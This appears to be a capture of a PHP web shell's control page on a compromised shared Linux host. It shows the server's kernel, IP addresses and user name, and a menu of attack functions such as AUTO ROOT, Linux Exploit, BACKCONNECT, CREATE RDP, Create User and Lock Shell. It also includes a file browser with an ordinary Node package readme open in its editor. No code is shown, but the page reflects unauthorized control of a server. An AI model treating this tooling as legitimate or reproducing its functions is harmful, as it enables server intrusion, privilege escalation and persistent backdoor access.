Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-builtin-status-codes /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.Debian.gz
691
B
-rw-r--r--
copyright
1.45
KB
-rw-r--r--
readme.md
610
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# builtin-status-codes [](https://travis-ci.org/bendrucker/builtin-status-codes) > The map of HTTP status codes from the builtin http module. Exposes the latest directly from `http` in Node, with a zero-dependencies version for the browser. ## Install ``` $ npm install --save builtin-status-codes ``` ## Usage ```js var codes = require('builtin-status-codes') codes[100] //=> Continue ``` ## Build To create a new browser build: ```sh $ npm run build ``` ## License MIT © [Ben Drucker](http://bendrucker.me)
Close